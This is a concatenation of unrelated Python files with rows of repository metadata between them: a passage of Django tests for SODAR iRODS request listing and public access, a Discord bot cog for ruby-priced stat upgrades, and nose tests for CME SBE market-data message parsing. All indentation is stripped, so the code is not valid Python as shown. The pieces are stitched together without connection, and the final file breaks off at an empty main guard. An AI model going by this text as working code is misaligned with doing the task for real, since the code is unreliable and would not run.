"""Test IrodsRequestListView"""
def test_list(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 1)
self.assertEqual(response.context['object_list'][0].path, self.path)
def test_list_as_admin_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user_contrib):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
def test_list_as_owner_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 1)
self.assertEqual(response.context['object_list'][0].path, self.path)
def test_list_as_contributor2_by_contributor(self):
"""Test GET request for listing delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user_contrib):
self.client.post(
reverse(
'samplesheets:irods_request_create',
kwargs={'project': self.project.sodar_uuid},
),
self.post_data,
)
self.assertEqual(IrodsDataRequest.objects.count(), 1)
with self.login(self.user_contrib2):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
def test_list_empty(self):
"""Test GET request for empty list of delete requests"""
self.assertEqual(IrodsDataRequest.objects.count(), 0)
with self.login(self.user):
response = self.client.get(
reverse(
'samplesheets:irods_requests',
kwargs={'project': self.project.sodar_uuid},
),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']), 0)
@skipIf(not BACKENDS_ENABLED, BACKEND_SKIP_MSG)
class TestSampleDataPublicAccess(
SampleSheetIOMixin,
SampleSheetTaskflowMixin,
SampleSheetPublicAccessMixin,
TestTaskflowBase,
):
"""Tests for granting/revoking public guest access for projects"""
def setUp(self):
super().setUp()
# Get iRODS session for rods user
self.irods_backend = get_backend_api('omics_irods')
self.irods = self.irods_backend.get_session()
# Create user in iRODS
self.user_no_roles = self.make_user(PUBLIC_USER_NAME)
try:
self.irods.users.create(
user_name=PUBLIC_USER_NAME,
user_type='rodsuser',
user_zone=self.irods.zone,
)
except irods.exception.CATALOG_ALREADY_HAS_ITEM_BY_THAT_NAME:
pass # In case a previous test failed before cleanup
self.irods.users.modify(PUBLIC_USER_NAME, 'password', PUBLIC_USER_PASS)
self.user_home_path = '/{}/home/{}'.format(
settings.IRODS_ZONE, PUBLIC_USER_NAME
)
self.assertTrue(self.irods.collections.exists(self.user_home_path))
self.user_session = get_backend_api(
'omics_irods',
user_name=PUBLIC_USER_NAME,
user_pass=PUBLIC_USER_PASS,
).get_session()
# Make publicly accessible project
self.project, self.owner_as = self._make_project_taskflow(
title='TestProject',
type=PROJECT_TYPE_PROJECT,
parent=self.category,
owner=self.user,
description='description',
public_guest_access=True,
)
# Import investigation and create collections
self.investigation = self._import_isa_from_file(
SHEET_PATH, self.project
)
self._make_irods_colls(self.investigation)
self.project_path = self.irods_backend.get_path(self.project)
self.sample_path = self.irods_backend.get_sample_path(self.project)
# Create test file
self.file_path = self.sample_path + '/' + TEST_FILE_NAME
self.irods.data_objects.create(self.file_path)
def tearDown(self):
# self.irods.collections.remove(self.user_home_path)
self.irods.users.remove(user_name=PUBLIC_USER_NAME)
super().tearDown()
def test_public_access(self):
"""Test public access for project"""
obj = self.user_session.data_objects.get(self.file_path)
self.assertIsNotNone(obj)
# Ensure no access to project root
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.project_path)
def test_public_access_disable(self):
"""Test public access with disabled access"""
self.set_public_access(False)
obj = self.irods.data_objects.get(self.file_path) # Test with owner
self.assertIsNotNone(obj)
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.file_path)
def test_public_access_reenable(self):
"""Test public access with disabled and re-enabled access"""
self.set_public_access(False)
self.set_public_access(True)
obj = self.irods.data_objects.get(self.file_path) # Test with owner
self.assertIsNotNone(obj)
obj = self.user_session.data_objects.get(self.file_path)
self.assertIsNotNone(obj)
# Ensure no access to project root
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.data_objects.get(self.project_path)
def test_public_access_nested(self):
"""Test public access for nested collection"""
new_coll_path = self.sample_path + '/new_coll'
coll = self.irods.collections.create(new_coll_path) # Test with owner
self.assertIsNotNone(coll)
coll = self.user_session.collections.get(new_coll_path)
self.assertIsNotNone(coll)
def test_public_access_nested_disable(self):
"""Test public access for nested collection with disabled access"""
self.set_public_access(False)
new_coll_path = self.sample_path + '/new_coll'
coll = self.irods.collections.create(new_coll_path) # Test with owner
self.assertIsNotNone(coll)
with self.assertRaises(irods.exception.CollectionDoesNotExist):
self.user_session.collections.get(new_coll_path)
| 36.236308 | 80 | 0.578452 | 6,927 | 71,458 | 5.74982 | 0.053559 | 0.070426 | 0.046398 | 0.03515 | 0.831982 | 0.798212 | 0.773231 | 0.745261 | 0.722865 | 0.703457 | 0 | 0.005256 | 0.323743 | 71,458 | 1,971 | 81 | 36.254693 | 0.818951 | 0.079123 | 0 | 0.706941 | 0 | 0 | 0.094563 | 0.044072 | 0 | 0 | 0 | 0 | 0.149743 | 1 | 0.037918 | false | 0.002571 | 0.017352 | 0 | 0.066838 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be49b42365066f6533aa9f926c4686dfbc653409 | 12,613 | py | Python | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | 5 | 2022-01-31T22:13:54.000Z | 2022-02-21T10:15:45.000Z | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | null | null | null | Not used/Upgrades.py | ReritoO-dev/enchanted-public | 68b3a5e9941e7c9c7bdb7edcabbb9bac1fa82e07 | [
"MIT"
] | 5 | 2022-01-31T17:51:45.000Z | 2022-02-14T19:17:11.000Z | import asyncio
import Config
import discord
from discord.ext import commands
import Utils
class Upgrades(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def restart_upgrade(self, msg, ctx, stat, account):
account = Utils.get_account(ctx.author.id)
if stat is None:
mystring = "Health: " + str(account['stats']['health']) + " | +1 for " + str(Utils.calc_health_upgrade_cost(account['stats']['health'])) + " "+Config.EMOJI['ruby']
mystring += "\nStrength: " + str(account['stats']['strength']) + " | +1 for " + str(Utils.calc_strength_upgrade_cost(account['stats']['strength'])) + " "+Config.EMOJI['ruby']
mystring += "\nDefense: " + str(account['stats']['defense']) + " | +1 for " + str(Utils.calc_defense_upgrade_cost(account['stats']['defense'])) + " "+Config.EMOJI['ruby']
mystring += "\nEndurance: " + str(account['stats']['endurance']) + " | +1 for " + str(Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])) + " "+Config.EMOJI['ruby']
embed = discord.Embed(color = Config.MAINCOLOR, title="Upgrade stats", description="You have " + str(account['rubies']) + " "+Config.EMOJI['ruby']+"\n\n" + mystring)
await msg.edit(embed=embed)
def check(reaction, user):
return user.id == ctx.author.id and reaction.message.id == msg.id and reaction.me
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=30, check=check)
await reaction.remove(user)
if str(reaction) == "🇭":
if account['rubies'] >= Utils.calc_health_upgrade_cost(account['stats']['health']):
account['rubies'] -= Utils.calc_health_upgrade_cost(account['stats']['health'])
account['stats']['health'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Health stat from `" + str(account['stats']['health'] - 1) + "` to `" + str(account['stats']['health']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇸":
if account['rubies'] >= Utils.calc_strength_upgrade_cost(account['stats']['strength']):
account['rubies'] -= Utils.calc_strength_upgrade_cost(account['stats']['strength'])
account['stats']['strength'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Strength stat from `" + str(account['stats']['strength'] - 1) + "` to `" + str(account['stats']['strength']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇩":
if account['rubies'] >= Utils.calc_defense_upgrade_cost(account['stats']['defense']):
account['rubies'] -= Utils.calc_defense_upgrade_cost(account['stats']['defense'])
account['stats']['defense'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Defense stat from `" + str(account['stats']['defense'] - 1) + "` to `" + str(account['stats']['defense']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇪":
if account['rubies'] >= Utils.calc_endurance_upgrade_cost(account['stats']['endurance']):
account['rubies'] -= Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])
account['stats']['endurance'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Endurance stat from `" + str(account['stats']['endurance'] - 1) + "` to `" + str(account['stats']['endurance']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
except asyncio.TimeoutError:
await ctx.message.delete()
await msg.delete()
@commands.command(aliases=['u'])
async def upgrade(self, ctx, stat:str=None):
msg, account = await Utils.get_account_lazy(self.bot, ctx, ctx.author.id)
if account is None:
return
if stat is None:
mystring = "Health: " + str(account['stats']['health']) + " | +1 for " + str(Utils.calc_health_upgrade_cost(account['stats']['health'])) + " "+Config.EMOJI['ruby']
mystring += "\nStrength: " + str(account['stats']['strength']) + " | +1 for " + str(Utils.calc_strength_upgrade_cost(account['stats']['strength'])) + " "+Config.EMOJI['ruby']
mystring += "\nDefense: " + str(account['stats']['defense']) + " | +1 for " + str(Utils.calc_defense_upgrade_cost(account['stats']['defense'])) + " "+Config.EMOJI['ruby']
mystring += "\nEndurance: " + str(account['stats']['endurance']) + " | +1 for " + str(Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])) + " "+Config.EMOJI['ruby']
embed = discord.Embed(color = Config.MAINCOLOR, title="Upgrade stats", description="You have " + str(account['rubies']) + " "+Config.EMOJI['ruby']+"\n\n" + mystring)
if msg is not None:
await msg.edit(embed=embed)
else:
msg = await ctx.send(embed=embed)
await msg.add_reaction("🇭")
await msg.add_reaction("🇸")
await msg.add_reaction("🇩")
await msg.add_reaction("🇪")
def check(reaction, user):
return user.id == ctx.author.id and reaction.message.id == msg.id and reaction.me
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=30, check=check)
await reaction.remove(user)
if str(reaction) == "🇭":
if account['rubies'] >= Utils.calc_health_upgrade_cost(account['stats']['health']):
account['rubies'] -= Utils.calc_health_upgrade_cost(account['stats']['health'])
account['stats']['health'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Health stat from `" + str(account['stats']['health'] - 1) + "` to `" + str(account['stats']['health']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇸":
if account['rubies'] >= Utils.calc_strength_upgrade_cost(account['stats']['strength']):
account['rubies'] -= Utils.calc_strength_upgrade_cost(account['stats']['strength'])
account['stats']['strength'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Strength stat from `" + str(account['stats']['strength'] - 1) + "` to `" + str(account['stats']['strength']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇩":
if account['rubies'] >= Utils.calc_defense_upgrade_cost(account['stats']['defense']):
account['rubies'] -= Utils.calc_defense_upgrade_cost(account['stats']['defense'])
account['stats']['defense'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Defense stat from `" + str(account['stats']['defense'] - 1) + "` to `" + str(account['stats']['defense']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
elif str(reaction) == "🇪":
if account['rubies'] >= Utils.calc_endurance_upgrade_cost(account['stats']['endurance']):
account['rubies'] -= Utils.calc_endurance_upgrade_cost(account['stats']['endurance'])
account['stats']['endurance'] += 1
Config.USERS.update_one({'user_id': ctx.author.id}, {'$set': {'stats': account['stats'], 'rubies': account['rubies']}})
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Upgraded Endurance stat from `" + str(account['stats']['endurance'] - 1) + "` to `" + str(account['stats']['endurance']) + "`.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
else:
await msg.edit(embed=discord.Embed(title="Upgrade stats", description="Cannot afford upgrade.", color = Config.MAINCOLOR))
await asyncio.sleep(3)
await self.restart_upgrade(msg, ctx, stat, account)
except asyncio.TimeoutError:
await ctx.message.delete()
await msg.delete()
def setup(bot):
bot.add_cog(Upgrades(bot))
| 72.074286 | 250 | 0.554666 | 1,328 | 12,613 | 5.185994 | 0.070783 | 0.111514 | 0.052272 | 0.080151 | 0.929287 | 0.922898 | 0.922898 | 0.922898 | 0.922898 | 0.922898 | 0 | 0.004882 | 0.285499 | 12,613 | 174 | 251 | 72.488506 | 0.757989 | 0 | 0 | 0.846667 | 0 | 0 | 0.162927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026667 | false | 0 | 0.033333 | 0.013333 | 0.086667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be6e05678957d17a00023b78190e7eada9076245 | 17,671 | py | Python | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | tests/test_sbe_parser.py | mehazardtfgm/sbedecoder | 375e2d1f9557778170bdf3c3f0c36e721f013f52 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import nose
from six.moves import urllib
import tempfile
import os
import binascii
from sbedecoder import SBESchema
from sbedecoder import SBEMessage
from sbedecoder import MDPMessageFactory
from sbedecoder import SBEParser
from nose.tools import assert_equals
class TestSBEParserLibrary:
SCHEMA_URL = 'ftp://ftp.cmegroup.com/SBEFix/Production/Templates/templates_FixBinary.xml'
LOCAL_TEMPLATE_FILENAME = None
@classmethod
def setup_class(cls):
TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME = tempfile.NamedTemporaryFile().name
urllib.request.urlretrieve(TestSBEParserLibrary.SCHEMA_URL, TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
@classmethod
def teardown_class(cls):
os.remove(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
def setup(self):
self.recorded_messages = []
def test_security_status_reset_statistics(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
try:
from sbedecoder.generated import __messages__ as generated_messages
schema.load(generated_messages)
except:
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('5603a9009c16d545349ad91428001e001e000100080003259845349ad914455300000000000000000000ffffff7fed4380150004')
offset = 12
for message in parser.parse(msg_buffer, offset):
self.recorded_messages.append(message)
# Validate that we parsed a security status message
assert_equals(1, len(self.recorded_messages))
recorded_message = self.recorded_messages[0]
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502401500001346819, recorded_message.transact_time.value)
assert_equals('Reset Statistics', recorded_message.security_trading_event.value)
assert_equals('ResetStatistics', recorded_message.security_trading_event.enumerant)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('PreOpen', recorded_message.security_trading_status.enumerant)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals('GroupSchedule', recorded_message.halt_reason.enumerant)
assert_equals(None, recorded_message.security_id.value)
def test_security_status(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('1409a900bbe7b5d5fe9ad91428001e001e000100080019989cd5fe9ad914455300000000000000000000ffffff7fed4380150001')
offset = 12
for message in parser.parse(msg_buffer, offset):
self.recorded_messages.append(message)
# Validate that we parsed a security status message
assert_equals(1, len(self.recorded_messages))
recorded_message = self.recorded_messages[0]
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502402370000951321, recorded_message.transact_time.value)
assert_equals('EndOfEvent', recorded_message.match_event_indicator.value)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals(None, recorded_message.security_id.value)
assert_equals('No Cancel', recorded_message.security_trading_event.value)
def test_incremental_refresh_verify_groups(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex(
'c30fa90082dd3f8b069bd91478000b0020000100080095ab3d8b069bd914840000200002009bb1203602000002000000805d00003e2d140001000000010030000000000080e8ca113602000002000000805d00003f2d140001000000020130000000000018000000000000019c53980a9600000024131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
if msg_count == 1:
assert_equals(32, message.template_id.value)
assert_equals(1502402403112954773, message.transact_time.value)
assert_equals(132, message.match_event_indicator.raw_value)
assert_equals('LastQuoteMsg, EndOfEvent', message.match_event_indicator.value)
groups = [x for x in message.groups]
assert_equals(2, len(groups))
repeating_groups = groups[0].repeating_groups # no_md_entries
n = 0
for repeating_group in repeating_groups:
if n == 0:
assert_equals(243150.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322302, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(1, repeating_group.md_price_level.value)
assert_equals(0, repeating_group.md_update_action.raw_value)
assert_equals('New', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
elif n == 1:
assert_equals(243125.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322303, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(2, repeating_group.md_price_level.value)
assert_equals(1, repeating_group.md_update_action.raw_value)
assert_equals('Change', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
n += 1
assert_equals(2, n)
repeating_groups = groups[1].repeating_groups # no_order_id_entries
n = 0
for repeating_group in repeating_groups:
if n == 0:
assert_equals(644422849436, repeating_group.order_id.value)
assert_equals(5437133604, repeating_group.md_order_priority.value)
assert_equals(2, repeating_group.md_display_qty.value)
assert_equals(1, repeating_group.reference_id.value)
assert_equals('Update', repeating_group.order_update_action.value)
assert_equals(1, repeating_group.order_update_action.raw_value)
n += 1
assert_equals(1, n)
def test_incremental_refresh_verify_group_attributes(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex(
'c30fa90082dd3f8b069bd91478000b0020000100080095ab3d8b069bd914840000200002009bb1203602000002000000805d00003e2d140001000000010030000000000080e8ca113602000002000000805d00003f2d140001000000020130000000000018000000000000019c53980a9600000024131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
if msg_count == 1:
assert_equals(32, message.template_id.value)
assert_equals(1502402403112954773, message.transact_time.value)
assert_equals(132, message.match_event_indicator.raw_value)
assert_equals('LastQuoteMsg, EndOfEvent', message.match_event_indicator.value)
n = 0
for repeating_group in message.no_md_entries:
if n == 0:
assert_equals(243150.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322302, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(1, repeating_group.md_price_level.value)
assert_equals(0, repeating_group.md_update_action.raw_value)
assert_equals('New', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
elif n == 1:
assert_equals(243125.0, repeating_group.md_entry_px.value)
assert_equals(2, repeating_group.md_entry_size.value)
assert_equals(23936, repeating_group.security_id.value)
assert_equals(1322303, repeating_group.rpt_seq.value)
assert_equals(1, repeating_group.number_of_orders.value)
assert_equals(2, repeating_group.md_price_level.value)
assert_equals(1, repeating_group.md_update_action.raw_value)
assert_equals('Change', repeating_group.md_update_action.value)
assert_equals('0', repeating_group.md_entry_type.raw_value)
assert_equals('Bid', repeating_group.md_entry_type.value)
n += 1
assert_equals(2, n)
n = 0
for repeating_group in message.no_order_id_entries:
if n == 0:
assert_equals(644422849436, repeating_group.order_id.value)
assert_equals(5437133604, repeating_group.md_order_priority.value)
assert_equals(2, repeating_group.md_display_qty.value)
assert_equals(1, repeating_group.reference_id.value)
assert_equals('Update', repeating_group.order_update_action.value)
assert_equals(1, repeating_group.order_update_action.raw_value)
n += 1
assert_equals(1, n)
def test_incremental_refresh_multiple_messages(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('c90fa9008a15428b069bd91458000b00200001000800e7c43d8b069bd91484000020000180b2654d360200008e0000000a610000f62fac003000000007013000000000001800000000000001e44c980a960000002b13144401000000010000000101000058000b002000010008006f203f8b069bd9148400002000018017336b3602000004000000805d0000402d140002000000020131000000000018000000000000016153980a960000002c131444010000000200000001010000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
if msg_count == 0:
assert_equals('MDIncrementalRefreshBook', message.name)
n = 0
for entry in message.no_md_entries:
if n == 0:
assert_equals(243225.0, entry.md_entry_px.value)
assert_equals(142, entry.md_entry_size.value)
n += 1
assert_equals(1, n)
elif msg_count == 1:
assert_equals('MDIncrementalRefreshBook', message.name)
n = 0
for entry in message.no_md_entries:
if n == 0:
assert_equals(243275.0, entry.md_entry_px.value)
assert_equals(4, entry.md_entry_size.value)
n += 1
assert_equals(1, n)
msg_count += 1
assert_equals(2, msg_count)
def test_incremental_refresh_trade_summary(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_factory = MDPMessageFactory(schema)
parser = SBEParser(msg_factory)
msg_buffer = binascii.a2b_hex('2f0aa9007decc6d2059bd91460000b002a000100080085b89fd2059bd91401000020000100f981d336020000020000000a610000fe2aac00020000000100ffffffff000010000000000000023051980a960000000200000000000000ad50980a960000000200000000000000')
offset = 12
msg_count = 0
for message in parser.parse(msg_buffer, offset):
msg_count += 1
assert_equals(42, message.template_id.value)
assert_equals(1502402400015595653, message.transact_time.value)
assert_equals(1, message.match_event_indicator.raw_value)
assert_equals('LastTradeMsg', message.match_event_indicator.value)
# This message has two repeating groups
assert_equals(2, len(message.groups))
# We expect only 1 md entry
for md_entry in message.no_md_entries:
assert_equals(243450.0, md_entry.md_entry_px.value)
assert_equals(2, md_entry.md_entry_size.value)
assert_equals(24842, md_entry.security_id.value)
assert_equals(11283198, md_entry.rpt_seq.value)
assert_equals(2, md_entry.number_of_orders.value)
assert_equals(1, md_entry.aggressor_side.raw_value)
assert_equals('Buy', md_entry.aggressor_side.value)
assert_equals(0, md_entry.md_update_action.raw_value)
assert_equals('New', md_entry.md_update_action.value)
assert_equals('2', md_entry.md_entry_type.value)
# We expect two trades in this message
num_order_id_entries = 0
for order_id_entry in message.no_order_id_entries:
num_order_id_entries += 1
if num_order_id_entries == 1:
assert_equals(644422848816, order_id_entry.order_id.value)
assert_equals(2, order_id_entry.last_qty.value)
else:
assert_equals(644422848685, order_id_entry.order_id.value)
assert_equals(2, order_id_entry.last_qty.value)
assert_equals(1, msg_count)
def test_sbemessage_parse_message(self):
schema = SBESchema(include_message_size_header=True, use_description_as_message_name=True)
try:
from sbedecoder.generated import __messages__ as generated_messages
schema.load(generated_messages)
except:
print('Loading local.')
schema.parse(TestSBEParserLibrary.LOCAL_TEMPLATE_FILENAME)
msg_buffer = binascii.a2b_hex('5603a9009c16d545349ad91428001e001e000100080003259845349ad914455300000000000000000000ffffff7fed4380150004')
offset = 12
recorded_message = SBEMessage.parse_message(schema, msg_buffer, offset)
# Validate that we parsed a security status message
assert_equals(30, recorded_message.template_id.value)
assert_equals('SecurityStatus', recorded_message.name)
assert_equals(17389, recorded_message.trade_date.value)
assert_equals(1502401500001346819, recorded_message.transact_time.value)
assert_equals('Reset Statistics', recorded_message.security_trading_event.value)
assert_equals('ResetStatistics', recorded_message.security_trading_event.enumerant)
assert_equals('Pre Open', recorded_message.security_trading_status.value)
assert_equals('PreOpen', recorded_message.security_trading_status.enumerant)
assert_equals('ES', recorded_message.security_group.value)
assert_equals('', recorded_message.asset.value)
assert_equals('Group Schedule', recorded_message.halt_reason.value)
assert_equals('GroupSchedule', recorded_message.halt_reason.enumerant)
assert_equals(None, recorded_message.security_id.value)
if __name__ == "__main__":
